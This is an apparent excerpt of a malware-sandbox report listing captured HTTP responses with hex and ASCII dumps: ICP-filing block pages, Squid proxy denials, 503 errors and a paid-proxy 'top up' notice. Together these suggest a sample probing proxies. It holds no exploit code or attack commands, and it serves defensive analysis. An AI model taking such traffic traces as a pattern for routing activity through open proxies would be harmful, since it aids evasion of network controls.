30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service Unavailablex-envoy-overloaded: truecontent-length: 81content-type: text/plaindate: Sat, 09 Mar 2024 11:54:29 GMTserver: svcproxyconnection: closeData Raw: 75 70 73 74 72 65 61 6d 20 63 6f 6e 6e 65 63 74 20 65 72 72 6f 72 20 6f 72 20 64 69 73 63 6f 6e 6e 65 63 74 2f 72 65 73 65 74 20 62 65 66 6f 72 65 20 68 65 61 64 65 72 73 2e 20 72 65 73 65 74 20 72 65 61 73 6f 6e 3a 20 6f 76 65 72 66 6c 6f 77 Data Ascii: upstream connect error or disconnect/reset before headers. reset reason: overflow
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: Content-Type,AccessToken,X-CSRF-Token, Authorization, TokenAccess-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE,UPDATEAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-TypeContent-Type: text/plain; charset=utf-8Set-Cookie: uuid=9b1e374f-de0e-11ee-9749-fa20201ff994; Path=/; Max-Age=8640000; HttpOnlyX-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:14:40 GMTContent-Length: 31Data Raw: 75 6e 73 75 70 70 6f 72 74 65 64 20 70 72 6f 74 6f 63 6f 6c 20 73 63 68 65 6d 65 20 22 22 0a Data Ascii: unsupported protocol scheme ""
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:42 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:42 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:42 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:42 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:44 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:44 GMTContent-Type: text/html;charset=utf-8Content-Length: 3832X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:45 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:45 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
